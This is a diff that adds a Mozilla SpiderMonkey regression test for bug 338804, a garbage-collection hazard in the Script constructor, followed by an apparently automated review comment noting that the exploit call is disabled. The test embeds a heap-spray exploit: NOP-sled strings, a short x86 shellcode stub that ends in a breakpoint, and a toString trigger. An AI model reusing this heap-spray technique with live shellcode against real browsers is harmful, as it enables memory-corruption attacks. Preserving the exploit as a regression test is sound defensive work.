js/src/tests/js1_5/extensions/regress-338804-01.js

changeset 0
6474c204b198
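--- /dev/null
+++ b/js/src/tests/js1_5/extensions/regress-338804-01.js
@@ -0,0 +1,69 @@
+/* -*- Mode: C++; tab-width: 2; indent-tabs-mode: nil; c-basic-offset: 2 -*- */
+/* This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
+
+//-----------------------------------------------------------------------------
+var BUGNUMBER = 338804;
+var summary = 'GC hazards in constructor functions';
+var actual = 'No Crash';
+var expect = 'No Crash';
+
+printBugNumber(BUGNUMBER);
+printStatus (summary);
+printStatus ('Uses Intel Assembly');
+
+// <script>
+// SpiderMonkey Script() GC hazard exploit
+//
+// scale: magic number ;-)
+//  BonEcho/2.0a2: 3000
+//  Firefox/1.5.0.4: 2000
+//
+var rooter, scale = 3000;
+
+/*
+  if(typeof(setTimeout) != "undefined") {
+  setTimeout(exploit, 2000);
+  } else {
+  exploit();
+  }
+*/
+
+function exploit() {
+  if (typeof Script == 'undefined')
+  {
+    print('Test skipped. Script not defined.');
+  }
+  else
+  {
+    Script({ toString: fillHeap });
+    Script({ toString: fillHeap });
+  }
+}
+
+function createPayload() {
+  var result = "\u9090", i;
+  for(i = 0; i < 9; i++) {
+    result += result;
+  }
+  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
+  result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
+  return result;
+}
+
+function fillHeap() {
+  rooter = [];
+  var payload = createPayload(), block = "", s2 = scale * 2, i;
+  for(i = 0; i < scale; i++) {
+    rooter[i] = block = block + payload;
+  }
+  for(; i < s2; i++) {
+    rooter[i] = payload + i;
+  }
+  return "";
+}
+
+// </script>
+ 
+reportCompare(expect, actual, summary);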
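Review bot: `exploit()` is never invoked in the new file, so execution reaches `reportCompare(expect, actual, summary)` with `actual` still at its initial 'No Crash' and the test passes without ever calling `Script()`; the only call sites are inside the commented-out setTimeout block above the function definitions. As written the file therefore cannot detect a regression of bug 338804, which is presumably not what a regression test is for. If the disablement is deliberate (the summary notes the payload is x86-specific and the trailing int3 is an intentional trap), a one-line comment above the commented block such as `// Invocation disabled on purpose: <reason>` would keep the next maintainer from reading this as a live test; otherwise an `exploit();` before `reportCompare` is what the file's structure suggests. The `typeof Script == 'undefined'` guard already gives a clean skip on engines without the legacy Script constructor, so enabling the call would not break other shells.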
